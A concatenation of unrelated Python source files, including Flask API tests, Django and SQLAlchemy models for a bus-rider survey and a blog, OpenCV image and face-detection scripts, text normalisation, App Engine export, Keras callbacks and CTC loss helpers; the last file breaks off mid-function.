def test_search_questions_blank_search_term(self):
res = self.client().post('/api/questions/search',
json={"search_term": ""})
data = json.loads(res.data)
total_questions = len(Question.query.all())
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertEqual(data['total_questions'], total_questions)
# POST Search Questions - no searchTerm
def test_search_questions_no_search_term(self):
res = self.client().post('/api/questions/search', json={})
data = json.loads(res.data)
self.assertEqual(res.status_code, 500)
self.assertEqual(data['success'], False)
# POST Play Quiz - One category
def test_play_quizz_one_category_empty_previous_questions(self):
res = self.client().post('/api/quizzes',
json={"quiz_category": {"id" : 6,
"type" : "Sports"},
"previous_questions" : []})
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertTrue(data['question'])
self.assertTrue(data['total_questions'])
# POST Play Quiz - Category out of bounds
def test_play_quizz_one_category_fake_category_id(self):
res = self.client().post('/api/quizzes',
json={"quiz_category": {"id": 99,
"type": "Fake"},
"previous_questions" : []})
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertTrue(data['message'])
# POST Play Quiz - with previous questions
def test_play_quizz_one_category_with_previous_questions(self):
res = self.client().post('/api/quizzes',
json={"quiz_category": {"id": 6,
"type": "Sports"},
"previous_questions": [62]})
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertTrue(data['question'])
self.assertTrue(data['total_questions'])
self.assertTrue(data['previousQuestions'])
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main() |
from importlib import import_module
from django.apps import AppConfig as BaseAppConfig
class AppConfig(BaseAppConfig):
name = "birdproj"
def ready(self):
import_module("birdproj.receivers")
import_module("birdproj.profiles.receivers")
import_module("wiki.receivers") # @@@ upgrade pinax-wiki to load in it's own apps.py
|
import argparse
import cv2
class DSample:
SUPPORTED_FORMATS = (
".bmp",
".dib",
".jpeg",
".jpg",
".jpe",
".jp2",
".png",
".pbm",
".pgm",
".ppm",
".sr",
".ras",
".tif",
".tiff",
)
def __init__(self, *args_dict, **kwargs):
for dictionary in args_dict:
for key in dictionary:
setattr(self, key, dictionary[key])
for key in kwargs:
setattr(self, key, kwargs[key])
self.image()
if self.gaussian_kernel:
self.blur()
self.dimensions()
self.scale_factor()
self.sample()
# DSample.image
def image(self):
"""Read image data"""
self.image = cv2.imread(self.filename)
# DSample.blur
def blur(self):
"""Apply Gaussian Blur"""
self.image = cv2.GaussianBlur(
self.image,
ksize=(0, 0),
sigmaX=1,
sigmaY=1
)
# DSample.dimensions
def dimensions(self):
"""Set image dimensions"""
self.dimensions = (self.image.shape[1], self.image.shape[0])
# DSample.scale_factor
def scale_factor(self):
"""Factor for downsample, 2x, 3x, 4x"""
scale = {
'2': (0.5, 0.5),
'3': (0.33, 0.33),
'4': (0.25, 0.25),
'5': (0.2, 0.2),
'6': (0.12, 0.12),
}
self.scale_factor = scale.get(self.downsample, None)
# DSample.sample
def sample(self):
"""Downsample the image."""
fx, fy = self.scale_factor or (1, 1)
self.d_sample = cv2.resize(
self.image,
(0, 0),
fx=fx,
fy=fy,
interpolation=cv2.INTER_CUBIC
)
self.p_sample = cv2.resize(
self.d_sample,
self.dimensions,
interpolation=cv2.INTER_CUBIC
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='downsample image using bicubic interpolation',
)
parser.add_argument(
"filename",
help="input filename to downsample"
)
parser.add_argument(
"-o",
"--output",
help="output filename for downsampled image"
)
parser.add_argument(
"-d",
"--downsample",
metavar='n',
help="downsample by a factor of 2, 3, 4, 5, 6"
)
parser.add_argument(
"-g",
"--gaussian-kernel",
help="apply a gaussian kernel, effective in reducing gaussian noise",
action="store_true"
)
parser.add_argument(
"-s",
"--save-dimensions",
help="downsampled image dimensions are the same as input dimensions",
action="store_true"
)
args = parser.parse_args()
dsample = DSample(**vars(args))
if dsample.save_dimensions:
cv2.imwrite(dsample.output, dsample.p_sample)
else:
cv2.imwrite(dsample.output, dsample.d_sample)
|
from TexTor import get_nlp
from TexTor.understand.coreference import replace_coreferences
from TexTor.understand.inflect import singularize as make_singular
from spacy.parts_of_speech import NOUN
def singularize(text, nlp=None):
nlp = nlp or get_nlp()
doc = nlp(text)
ignores = ["this", "data", "my", "was"]
replaces = {"are": "is"}
words = []
for tok in doc:
if tok.pos == NOUN and str(tok) not in ignores:
words.append(make_singular(str(tok)))
elif str(tok) in replaces:
words.append(replaces[str(tok)])
else:
words.append(str(tok))
return " ".join(words)
def normalize(text, remove_articles=False, solve_corefs=False,
make_singular=False, coref_nlp=None, nlp=None):
text = str(text)
words = text.split() # this also removed extra spaces
normalized = ""
for word in words:
if remove_articles and word in ["the", "a", "an"]:
continue
# Expand common contractions, e.g. "isn't" -> "is not"
contraction = ["ain't", "aren't", "can't", "could've", "couldn't",
"didn't", "doesn't", "don't", "gonna", "gotta",
"hadn't", "hasn't", "haven't", "he'd", "he'll", "he's",
"how'd", "how'll", "how's", "I'd", "I'll", "I'm",
"I've", "isn't", "it'd", "it'll", "it's", "mightn't",
"might've", "mustn't", "must've", "needn't",
"oughtn't",
"shan't", "she'd", "she'll", "she's", "shouldn't",
"should've", "somebody's", "someone'd", "someone'll",
"someone's", "that'll", "that's", "that'd", "there'd",
"there're", "there's", "they'd", "they'll", "they're",
"they've", "wasn't", "we'd", "we'll", "we're", "we've",
"weren't", "what'd", "what'll", "what're", "what's",
"whats", # technically incorrect but some STT outputs
"what've", "when's", "when'd", "where'd", "where's",
"where've", "who'd", "who'd've", "who'll", "who're",
"who's", "who've", "why'd", "why're", "why's", "won't",
"won't've", "would've", "wouldn't", "wouldn't've",
"y'all", "ya'll", "you'd", "you'd've", "you'll",
"y'aint", "y'ain't", "you're", "you've"]
if word.lower() in contraction:
expansion = ["is not", "are not", "can not", "could have",
"could not", "did not", "does not", "do not",
"going to", "got to", "had not", "has not",
"have not", "he would", "he will", "he is",
"how did",
"how will", "how is", "I would", "I will", "I am",
"I have", "is not", "it would", "it will", "it is",
"might not", "might have", "must not", "must have",
"need not", "ought not", "shall not", "she would",
"she will", "she is", "should not", "should have",
"somebody is", "someone would", "someone will",
"someone is", "that will", "that is", "that would",
"there would", "there are", "there is", "they would",
"they will", "they are", "they have", "was not",
"we would", "we will", "we are", "we have",
"were not", "what did", "what will", "what are",
"what is",
"what is", "what have", "when is", "when did",
"where did", "where is", "where have", "who would",
"who would have", "who will", "who are", "who is",
"who have", "why did", "why are", "why is",
"will not", "will not have", "would have",
"would not", "would not have", "you all", "you all",
"you would", "you would have", "you will",
"you are not", "you are not", "you are", "you have"]
word = expansion[contraction.index(word.lower())]
if make_singular:
nlp = nlp or get_nlp()
word = singularize(word, nlp=nlp)
normalized += " " + word
if solve_corefs:
normalized = replace_coreferences(normalized[1:], coref_nlp)
return normalized.strip()
if __name__ == "__main__":
sentence = "What's the weather like?"
print(normalize(sentence))
# NOTE, contractions are lower cased when expanded
assert normalize(sentence) == "what is weather like?"
sentence = "My sister loves dogs."
assert normalize(sentence, make_singular=True) == "My sister love dog."
sentence = "My sister has a dog. She loves him."
assert normalize(sentence, solve_corefs=True) == "My sister has a dog. " \
"My sister loves a dog." |
import cv2
import os
from PIL import Image
import imutils
from io import BytesIO
import base64
haar_file = 'haarcascade_frontalface_default.xml'
# img sample size
(width, height) = (130, 100)
face_algo = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
def detect():
video = cv2.VideoCapture(0)
address = "http://192.168.43.1:8080/video"
video.open(address)
while True:
(_, im) = video.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_algo.detectMultiScale(gray, 1.3, 2)
for x, y, w, h in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
face = gray[y:y + h, x:x + w]
face_resize = cv2.resize(face, (width, height))
cv2.imshow("test", frame)
key = cv2.waitKey(1)
if key == ord('q'):
break
video.release()
cv2.destroyAllWindows
return True
|
import json
import datetime
from django import template
from django.db.models import Avg
from general.models import *
register = template.Library()
@register.filter
def is_accepted(player, game):
try:
return GameInvitation.objects.filter(player=player, game=game)[0].is_accepted
except Exception as e:
return False
@register.filter
def player_count(game):
return GameInvitation.objects.filter(game=game, is_accepted=True).count()
@register.filter
def game_count(location):
return location.events.filter(datetime__gte=datetime.datetime.now()).count()
@register.filter
def ids(qs):
return ','.join([str(ii.id) for ii in qs])
|
from datetime import datetime
from app.core.domain.comment import Comment
from app.core.domain.post import Post
from .database import db
class PostModel(db.Model):
__tablename__ = "posts"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.Unicode(255))
body = db.Column(db.UnicodeText())
created_at = db.Column(db.DateTime, default=datetime.utcnow)
updated_at = db.Column(
db.DateTime, default=datetime.utcnow, onupdate=datetime.utcnow
)
def to_entity(self):
return Post.from_dict(
{
"id": self.id,
"title": self.title,
"body": self.body,
"comments": [c.to_dict() for c in self.comments],
}
)
class CommentModel(db.Model):
__tablename__ = "comments"
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.UnicodeText)
post_id = db.Column(db.Integer, db.ForeignKey(PostModel.id))
post = db.relationship(PostModel, backref="comments")
created_at = db.Column(db.DateTime, default=datetime.utcnow)
updated_at = db.Column(
db.DateTime, default=datetime.utcnow, onupdate=datetime.utcnow
)
def to_dict(self):
return {"id": self.id, "post_id": self.post_id, "body": self.body}
def to_entity(self):
return Comment.from_dict(
{"id": self.id, "post_id": self.post_id, "body": self.body}
)
|
# -- coding: utf-8 --
import uuid
from django.contrib.auth.models import User
from django.db import models
from datetime import date, time, datetime
from django.utils.encoding import python_2_unicode_compatible
from django.db.models.query import QuerySet
""" constantes """
#momento de la encuesta
ANTES_ASCENDER = 'AA'
LUEGO_DESCENDER = 'LD'
PARADA = 'P' #tipos de Lugares.parada
class ActivosQuerySet(QuerySet):
def delete(self):
self.update(activo=False)
class AdministrarActivos(models.Manager):
def activo(self):
return self.model.objects.filter(activo=True)
def get_queryset(self):
return ActivosQuerySet(self.model, using=self._db)
@python_2_unicode_compatible
class Numerador (models.Model):
nombre = models.CharField(max_length=30, blank='true',unique=True)
ultimo_valor = models.IntegerField(default=0)
def __str__(self):
return self.nombre
#from nqnmovilutiles import sigNumero,completarConCeros #Como usa Numerador, lo importo después de que existe en model
""" signumero y completar con ceros deben moverse a un archirvo nqnmovilutiles"""
def sigNumero(nombreNumerador):
try:
n = Numerador.objects.get(nombre=nombreNumerador)
except Numerador.DoesNotExist:
#Si no existe en la BD, lo creo
n = Numerador(nombre=nombreNumerador, ultimo_valor = 1)
n.save()
return n.ultimo_valor
else:
#si existe, incremento el valor, lo guardo y lo retorno
n.ultimo_valor += 1
n.save()
return n.ultimo_valor
def completarConCeros( numero, longitud):
numerotxt = str(numero)
return numerotxt.zfill(longitud)
@python_2_unicode_compatible
class Campania (models.Model):
descripcion = models.CharField('Descripción',max_length=100)
fecha_inicio = models.DateField('Fecha de inicio', default=date.today)
fecha_fin = models.DateField('Fecha de fin')
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Campaña"
verbose_name_plural = "Campañas"
#@python_2_unicode_compatible
class Encuestador (models.Model):
usuario = models.ForeignKey(User)
activo = models.BooleanField('Encuestador activo',default=True)
def __str__(self):
return self.usuario.get_full_name()#self.usuario.first_name
class Meta:
verbose_name = "Encuestador"
verbose_name_plural = "Encuestadores"
def delete(self):
self.activo = False
self.save()
@python_2_unicode_compatible
class Parada (models.Model):
numero = models.CharField('Número',max_length=10)
def __str__(self):
return self.numero
class Meta:
verbose_name = "Parada"
verbose_name_plural = "Paradas"
@python_2_unicode_compatible
class Linea (models.Model):
nombre = models.CharField('nombre de la línea',max_length=10)
def __str__(self):
return self.nombre
@python_2_unicode_compatible
class Lugar (models.Model):
#tipo de lugar
ZONA= 'Z'
HITO = 'H'
PARADA = 'P'
CALLE = 'C'
BARRIO = 'B'
TIPO_LUGAR = (
(ZONA, 'Zona'),
(HITO, 'Hito'),
(PARADA, 'Parada'),
(CALLE, 'Calle'),
(BARRIO, 'Barrio')
)
tipo = models.CharField('Tipo de lugar',max_length=1, choices=TIPO_LUGAR, blank='true')
nombre = models.CharField('Nombre del lugar',max_length=100)
def __str__(self):
return self.nombre
class Meta:
verbose_name = "Lugar"
verbose_name_plural = "Lugares"
@python_2_unicode_compatible
class Motivo (models.Model):
nombre = models.CharField('nombre del motivo',max_length=100)
def __str__(self):
return self.nombre
@python_2_unicode_compatible
class Encuesta (models.Model):
#momento de la encuesta
ANTES_ASCENDER = 'AA'
LUEGO_DESCENDER = 'LD'
MOMENTO = (
(ANTES_ASCENDER, 'antes de ascender'),
(LUEGO_DESCENDER, 'luego de descender'),
)
#sexo
FEMENINO = 'F'
MASCULINO = 'M'
SEXO = (
(FEMENINO, 'Femenino'),
(MASCULINO, 'Masculino'),
)
#rango de edad
JOVEN = 'JO'
ADULTO = 'A1'
ADULTO_MAYOR = 'AM'
RANGO_EDAD = (
(JOVEN,'Jóven (18-25 años)'),
(ADULTO,'Adulto (25-60 años)'),
(ADULTO_MAYOR,'Adulto mayor (más de 60 años)'),
)
#tipo de lugar
ZONA= 'Z'
HITO = 'H'
PARADA = 'P'
TIPO_LUGAR = (
(ZONA, 'Zona'),
(HITO, 'Hito'),
(PARADA, 'Parada'),
)
#datos sobre el procedimiento de encuesta
#nousar esto: id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
referencia = models.CharField('Número de encuesta',max_length=10,blank='true') #autoincremental
encuestador = models.ForeignKey('Encuestador',Encuestador, null='true')
parada_encuesta = models.ForeignKey(Parada,verbose_name='Parada', null='true', on_delete= models.PROTECT)
cargaonline = models.BooleanField('Encuesta cargada en línea',default=True)
dia_realizada = models.DateField('fecha de realización', default=date.today)
hora_realizada = models.TimeField('hora de realización', default= time(16, 00))
hora_inicio = models.DateTimeField(blank = 'true', null = 'true')
hora_fin = models.DateTimeField(blank = 'true', null = 'true')
momento = models.CharField('Momento de la encuesta',max_length=2, choices=MOMENTO, default= ANTES_ASCENDER)
#perfil del usuario
sexo = models.CharField('1.a. Sexo',max_length=1, choices=SEXO)
rango_edad = models.CharField('1.b. Rango de edad',max_length=2, choices=RANGO_EDAD)
#origen del viaje
#parahacer:ocultar lugar y parada tanto de origen como destino o dejar que lo carguen en blanco
origen_lugar = models.ForeignKey(Lugar, related_name='encuesta_origen_lugar', null='true', blank='true', on_delete= models.PROTECT)
origen_motivo = models.ForeignKey(Motivo,verbose_name='2.a. Motivo del viaje. Desde',related_name='encuesta_origen_motivo', null='true', on_delete= models.PROTECT)
origen_parada = models.CharField('Parada de origen (opcional)',max_length=10, blank='true') #solo se carga si el tipo de lugar es parada
#destino del viaje
destino_lugar = models.ForeignKey(Lugar,related_name='encuesta_destino_lugar', null='true', blank='true', on_delete= models.PROTECT)
destino_motivo = models.ForeignKey(Motivo,verbose_name='2.b. Motivo del viaje. Hacia',related_name='encuesta_destino_motivo', null='true', on_delete= models.PROTECT)
destino_parada = models.CharField('Parada de destino (opcional)',max_length=10, blank='true') #solo se carga si el tipo de lugar es parada
#detalles del viaje
#veces por semana
TODOS_LOS_DIAS = 'TODOS'
TRES_O_MAS = '3OMAS'
MENOS_DE_TRES = 'MENOS3'
VECES_SEMANA = (
(TODOS_LOS_DIAS, 'Todos los días'),
(TRES_O_MAS, 'Tres o más'),
(MENOS_DE_TRES, 'Menos de tres'),
)
veces_semana = models.CharField('3.a. Veces por semana en que realiza este viaje',max_length=6, choices=VECES_SEMANA)
#veces por día
DOS_O_MAS = '2OMAS'
MENOS_DE_DOS = 'MENOS2'
VECES_DIA = (
(DOS_O_MAS, 'Dos o más'),
(MENOS_DE_DOS, 'Menos de dos'),
)
veces_dia = models.CharField('3.b. Veces por día en que realiza este viaje',max_length=6, choices=VECES_DIA)
#otros medios de transporte
NO_OTRO_MEDIO = 'NO'
OTRA_LINEA = 'OLINEA'
AUTO = 'AUTO'
TAXI_REMIS = 'TAXREM'
OTRO = 'OTRO'
OTRO_MEDIO = (
(NO_OTRO_MEDIO,'No'),
(OTRA_LINEA,'Otra línea'),
(AUTO,'Automóvil'),
(TAXI_REMIS,'Taxi o Remis'),
(OTRO,'Otro medio'),
)
otro_medio = models.CharField('4. Para completar el viaje ¿Usa otro medio de transporte?',max_length=6, choices=OTRO_MEDIO)
linea = models.ForeignKey(Linea,verbose_name='5. ¿En qué línea de transporte suele viajar?', null='true', on_delete= models.PROTECT)
#calidad del servicio
MUY_BUENO = 'MB'
BUENO = 'BU'
REGULAR = 'RE'
MALO = 'MA'
NS_NC = 'NS'
CALIFICA_CALIDAD = (
(MUY_BUENO, 'muy bueno'),
(BUENO, 'bueno'),
(REGULAR, 'regular'),
(MALO, 'malo'),
(NS_NC, 'Ns/Nc'),
)
estado_unidad = models.CharField('6.a. Estado general de las unidades',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
comodidad = models.CharField('6.b. Comodidad con la que viaja',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
higiene_unidad = models.CharField('6.c. Higiene de las unidadades',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
trato_choferes = models.CharField('7.a. Nivel de trato y atención recibida por los choferes',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
conduccion_choferes = models.CharField('7.b. Desempeño de los choferes en la conducción',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
info_choferes = models.CharField('7.c. Nivel de información del sistema de transporte de los choferes?',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
#Interes en servicios anexos
SI = 'SI'
NO = 'NO'
NO_ME_INTERESA = 'NI'
NO_LO_CONOZCO = 'NC'
INTERES_SERVICIOS_ANEXOS = (
(SI,'Si'),
(NO,'No'),
(NO_LO_CONOZCO,'No. No lo conozco'),
)
#medios de información de transporte
WEB_CUANDOPASA = 'WC'
WEB_MUNICIPAL = 'WM'
CONSULTAS_TELEFONICAS = 'CT'
MENSAJE_TEXTO = 'MT'
CARTELES_INTELIGENTES ='CI'
APP_CEL_CUANDO_PASA = 'CP'
USA_MEDIOS_INFORMACION = (
(SI,'Si'),
(NO,'No'),
(NO_ME_INTERESA,'No. No estoy interesado/a'),
(NO_LO_CONOZCO,'No. No lo conozco'),
(WEB_CUANDOPASA,'Si. Página web de cuandopasa.com'),
(WEB_MUNICIPAL,'Si. Página web de la Municipalidad'),
(CONSULTAS_TELEFONICAS,'Si. Consultas telefónicas'),
(MENSAJE_TEXTO,'Si. Mensaje de texto'),
(CARTELES_INTELIGENTES,'Si. Carteles de información LED'),
)
usa_medio_informacion = models.CharField('8. ¿Utiliza algún medio de información de transporte?',max_length=2, choices=USA_MEDIOS_INFORMACION, default = NO_LO_CONOZCO)
usa_trasbordo = models.CharField('9. ¿Utiliza el servicio de trasbordo?',max_length=2, choices=INTERES_SERVICIOS_ANEXOS, default = NO)
#paraHacer:tarjeta sube
#beneficios tarjeta sube
BENEF_SUBE_NO = 'BS_NO'
BENEF_SUBE_SI_ANSES = 'BS_AN'
BENEF_SUBE_SI_ESCOLAR = 'BS_ES'
BENEF_SUBE_SI_UNIVERSITARIO = 'BS_UN'
BENEF_SUBE_SI_JUCAID = 'BS_JU'
SUBE_BENEFICIOS = {
(BENEF_SUBE_NO,'No'),
(SI,'Si'),
(BENEF_SUBE_SI_ANSES,'Si. ANSES'),
(BENEF_SUBE_SI_ESCOLAR,'Si. Escolar'),
(BENEF_SUBE_SI_UNIVERSITARIO,'Si. Universitario'),
(BENEF_SUBE_SI_JUCAID,'Si. JUCAID'),
}
sube_beneficios = models.CharField('9.1 ¿Su tarjeta SUBE tiene algún beneficio?',max_length=5, choices=SUBE_BENEFICIOS, default = BENEF_SUBE_NO)
#opinión mejora en servicio
MEJORO_BASTANTE = 'MB'
MEJORO_MEDIANAMENTE = 'MM'
MEJORO_POCO = 'MP'
NO_MEJORO = 'NM'
MEJORA_SERVICIO = (
(MEJORO_BASTANTE,'Mejoró bastante'),
(MEJORO_MEDIANAMENTE,'Mejoró medianamente'),
(MEJORO_POCO,'Mejoró poco'),
(NO_MEJORO,'No mejoró'),
(NS_NC, 'Ns/Nc'),
)
opinion_servicio = models.CharField('9.2. ¿En este último tiempo, considera que el servicio brindado por la Empresa?',max_length=2, choices=MEJORA_SERVICIO, default = NS_NC)
opinion_trabajo_muni = models.CharField('9.3. ¿Cómo calificaría el trabajo que está realizando la Municipalidad para el control y mejoramiento del servicio?',max_length=2, choices=CALIFICA_CALIDAD, default = NS_NC)
sugerencia = models.CharField('10. ¿Tiene alguna sugerencia o comentario?',max_length=140, blank='true')
activo = models.BooleanField('Encuesta activa',default=True)
ESTADO_COMPLETA = 'COM'
ESTADO_INCOMPLETA = 'INC'
ESTADOS = (
(ESTADO_COMPLETA, 'Si. Encuesta completa'),
(ESTADO_INCOMPLETA, 'No. Terminaré de cargarla más adelante'),
)
estado = models.CharField('¿Da por finalizada la carga de la encuesta?',max_length=3, choices=ESTADOS, default = ESTADO_INCOMPLETA)
def __str__(self):
return self.referencia
#sólo permito borrado lógico, también proveo lista de encuestas activas
objects = AdministrarActivos()
def delete(self):
self.activo = False
self.save()
def save(self, *args, **kwargs):
#si es insert (id= 0), asignar referencia autoincremental
if self.id is None:
self.referencia = completarConCeros( sigNumero('encuesta_campania_0001'), 5)
unaparada = Lugar.objects.get(tipo = PARADA) #debe haber un solo Lugar de tipo PARADA
#Valores por defecto de paradas de origen y destino. Se inhabilita por carga manual
#self.origen_parada = self.parada_encuesta.numero if self.momento == ANTES_ASCENDER else '' #Si se releva al subir, uso la parada de la encuesta como origen
#self.origen_lugar = unaparada if self.momento == ANTES_ASCENDER else None
#self.destino_parada = self.parada_encuesta.numero if self.momento == LUEGO_DESCENDER else '' #Si se releva al bajar, uso la parada de la encuesta como destino
#self.destino_lugar = unaparada if self.momento == LUEGO_DESCENDER else None
super(Encuesta, self).save(*args, **kwargs) # Call the "real" save() method.
def origenfijo(self): #el lugar y parada de origen no se pueden modificar
return True if self.momento == ANTES_ASCENDER else False
|
"""Export survey data to Cloud Storage.
This implements a new admin-only page that allows exporting survey data from
the App Engine Datastore into a file in Cloud Storage, for easy downloading.
Alternately, this can export the data from Datastore into a Spreadsheet in the
admin's Google Drive.
"""
import datetime
import gc
import json
import site
import time
site.addsitedir('lib')
import cloudstorage as gcs
from models import SurveyModel
import webapp2
from google.appengine.api import taskqueue
package = 'ChromeExperienceSampling'
EXPORT_PAGE_HTML = """\
<html>
<body>
<form action='/export' method='post'>
<div><input type='submit' value='Start Export'></div>
</form>
</body>
</html>
"""
class ModelEncoder(json.JSONEncoder):
"""Some property types don't encode to JSON, so we explicitly handle them."""
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.isoformat()
return json.JSONEncoder.default(self, obj)
class ExportPage(webapp2.RequestHandler):
"""Serves a form to add a taskqueue job to export data."""
def get(self):
self.response.write(EXPORT_PAGE_HTML)
def post(self):
taskqueue.add(url='/export/worker',
params={'filename': self.request.get('filename')})
self.redirect('/export')
class ExportWorker(webapp2.RequestHandler):
"""Taskqueue worker to do the Datastore to Cloud Storage export.
Can optionally take in a filename to use for the file in Cloud Storage.
If not specified, it will use a default name plus the date and time.
Repeatedly queries for more SurveyModel items from the Datastore, appending
them one at a time to the export file in order to minimize memory usage.
"""
def post(self):
bucket_name = 'survey_responses'
filename = self.request.get('filename')
if not filename:
time_string = time.strftime('%Y_%m_%d_%H%M%S_%Z')
filename = '.'.join(['surveys', time_string, 'json'])
def export_data(filename):
with gcs.open('/' + bucket_name + '/' + filename, 'w') as f:
query = SurveyModel.query()
cursor = None
more = True
delim = ''
f.write('[')
while more:
records, cursor, more = query.fetch_page(50, start_cursor=cursor)
gc.collect()
for record in records:
f.write(delim)
f.write(json.dumps(record.to_dict(), cls=ModelEncoder))
delim = ',\n'
f.write(']')
export_data(filename)
APPLICATION = webapp2.WSGIApplication([
('/export/', ExportPage),
('/export', ExportPage),
('/export/worker', ExportWorker)
])
|
# -*- coding: utf-8 -*-
import sys
import os
import logging
import pickle
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
import numpy as np
import tensorflow.contrib.keras as ker
from tensorflow.contrib.keras.python.keras import backend as K
from sklearn.metrics import precision_recall_fscore_support
from conf import config
# Set up python logging format
log_format = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(format=log_format, level=logging.INFO)
# Declare parameters
DIR_DETAILED_RESULTS = config.DIR_DETAILED_RESULTS
def set_last_layers_trainable(model, train_layer):
"""Method which sets all layers after the one defines as trainable. The ones before being not trainable.
:param model: model with its layers
:param train_layer: layer number from which we want to train them
:return: the updated model
"""
if train_layer == 0:
for layer in model.layers:
layer.trainable = False
else:
for layer in model.layers[:train_layer]:
layer.trainable = False
for layer in model.layers[train_layer:]:
layer.trainable = True
return model
class DecayLR(ker.callbacks.Callback):
"""Class to define a learning rate which decreases in time"""
def __init__(self, decay):
"""Constructor
:param decay: decay between [0, 1] used to reduce the learning rate
"""
super(DecayLR, self).__init__()
self.decay = decay
def on_epoch_begin(self, epoch, logs={}):
"""Processes called at the beginning of each epoch during the training of the model
:param epoch: epoch number
:param logs: dictionary of logs
"""
old_lr = K.get_value(self.model.optimizer.lr)
if epoch % 3 == 0 and epoch > 0:
new_lr = self.decay * old_lr
K.set_value(self.model.optimizer.lr, new_lr)
logging.info("New value for the learning rate : {}".format(K.get_value(self.model.optimizer.lr)))
else:
K.set_value(self.model.optimizer.lr, old_lr)
class MetricsDetailedScore(ker.callbacks.Callback):
"""Class to save metrics in a pickle file (precision, recall, f1score and support)"""
def __init__(self, test_name):
"""Constructor
:param test_name: name of the training test used to save the file with all the metrics
"""
super(MetricsDetailedScore, self).__init__()
self.test_name = test_name
def on_train_end(self, logs={}):
"""Processes called at the end of the training of the model"""
# Compute predictions
predict = self.model.predict(self.validation_data[0])
best_idx = np.argmax(predict, axis=1).reshape(len(predict), 1)
predict_dumm = np.concatenate([1 - best_idx, best_idx], axis=1)
# Compute and save the metrics using the ground truth and the predictions
all_indicators = precision_recall_fscore_support(self.validation_data[1], predict_dumm)
with open(DIR_DETAILED_RESULTS + self.test_name + '.pkl', 'wb') as f:
pickle.dump(all_indicators, f)
|
class Car:
def __init__(self, p_make, p_mileage):
self.__make=p_make
self.__mileage=p_mileage
def get_make(self):
return self.__make
def get_mileage(self):
return self.__mileage
def __str__(self):
return super().__str__()
class Toyota(Car):
def __init__(self, p_make, p_mileage, p_model, p_price):
Car.__init__(self, p_make, p_mileage)
self.__model=p_model
self.__price=p_price
self.__company='Toyota'
def get_car_info(self):
print("Company : ", self.__company)
print("Model : ", self.__model)
print("Make : ", super().get_make())
print("Mileage : ", super().get_mileage())
print("Price : ", self.__price)
class Maruti(Car):
def __init__(self, p_make, p_mileage, p_model, p_price):
Car.__init__(self, p_make, p_mileage)
self.__model=p_model
self.__price=p_price
self.__company='Maruti'
def get_car_info(self):
print("Company : ", self.__company)
print("Model : ", self.__model)
print("Make : ", super().get_make())
print("Mileage : ", super().get_mileage())
print("Price : ", self.__price)
def main():
p_mileage=int(input("Enter the mileage :\n"))
p_make=int(input("Enter the make :\n"))
p_model=input("Enter the model :\n")
p_price=int(input("Enter the price :\n"))
used_toyota = Toyota(p_make, p_mileage, p_model, p_price)
p_mileage = int(input("Enter the mileage :\n"))
p_make = int(input("Enter the make :\n"))
p_model = input("Enter the model :\n")
p_price = int(input("Enter the price :\n"))
used_maruti = Maruti(p_make, p_mileage, p_model, p_price)
used_toyota.get_car_info()
used_maruti.get_car_info()
main()
|
import tensorflow as tf
# from loss.ctc_ops import ctc_loss_v2, ctc_label_dense_to_sparse, ctc_unique_labels
from loss import ctc_ops
from tensorflow.python.ops import array_ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import sparse_tensor
"""
https://github.com/hirofumi0810/neural_sp/blob/master/neural_sp/models/seq2seq/decoders/ctc.py
"""
def _get_dim(tensor, i):
"""Get value of tensor shape[i] preferring static value if available."""
return tensor_shape.dimension_value(
tensor.shape[i]) or array_ops.shape(tensor)[i]
def check_tf_version():
version = tf.__version__
print("==tf version==", version)
tf.logging.info("** version **")
tf.logging.info(version)
if int(version.split(".")[0]) >= 2 or int(version.split(".")[1]) >= 15:
return True
else:
return False
def sparse_ctc_loss(y_true, y_pred, input_length,
label_length,
time_major=False,
blank_index=0):
y_true = tf.cast(y_true, tf.int32)
y_pred = tf.cast(y_pred, tf.float32)
input_length = tf.cast(input_length, tf.int32)
label_length = tf.cast(label_length, tf.int32)
if time_major:
y_pred = tf.transpose(y_pred, [1,0,2])
labels = ctc_ops.ctc_label_dense_to_sparse(y_true, label_length)
logits = y_pred
if blank_index < 0:
blank_index += _get_dim(logits, 2)
if blank_index != _get_dim(logits, 2) - 1:
logits = array_ops.concat([
logits[:, :, :blank_index],
logits[:, :, blank_index + 1:],
logits[:, :, blank_index:blank_index + 1],
],
axis=2)
labels = sparse_tensor.SparseTensor(
labels.indices,
array_ops.where(labels.values < blank_index, labels.values,
labels.values - 1), labels.dense_shape)
tf.logging.info("** blank_index **")
tf.logging.info(blank_index)
return tf.nn.ctc_loss(
labels=labels,
inputs=logits,
sequence_length=input_length,
preprocess_collapse_repeated=False,
ctc_merge_repeated=True,
time_major=time_major
)
def dense_ctc_loss(y_true, y_pred,
input_length,
label_length,
indices=None,
blank_index=0,
time_major=False):
if time_major:
y_pred = tf.transpose(y_pred, [1,0,2])
y_true = tf.cast(y_true, tf.int32)
y_pred = tf.cast(y_pred, tf.float32)
input_length = tf.cast(input_length, tf.int32)
label_length = tf.cast(label_length, tf.int32)
tf.logging.info("*** y_true ***")
tf.logging.info(y_true)
